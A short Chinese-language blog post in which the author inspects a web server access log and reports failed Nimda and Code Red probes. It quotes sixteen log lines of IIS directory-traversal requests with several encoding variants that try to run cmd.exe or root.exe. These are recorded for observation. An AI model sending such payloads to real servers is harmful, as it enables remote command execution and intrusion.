查了一下 access log,發現一些有趣的東西。上網查了一下,原來是頂頂有名的 Nimda、Code Red。看來即使已經過了流行高峰期,被感染的電腦還是蠻多的。下面這些請求都是在找 IIS 上的 cmd.exe 或 root.exe,而每一筆的回應都是 404 或 400,也就是都沒有成功。

61.150.x.x - "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277
61.150.x.x - "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 275
61.150.x.x - "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
61.150.x.x - "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
61.150.x.x - "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
61.150.x.x - "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
61.150.x.x - "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
61.150.x.x - "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
61.150.x.x - "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
61.150.x.x - "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
61.150.x.x - "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
61.150.x.x - "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
61.150.x.x - "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
61.150.x.x - "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
61.150.x.x - "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
61.150.x.x - "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299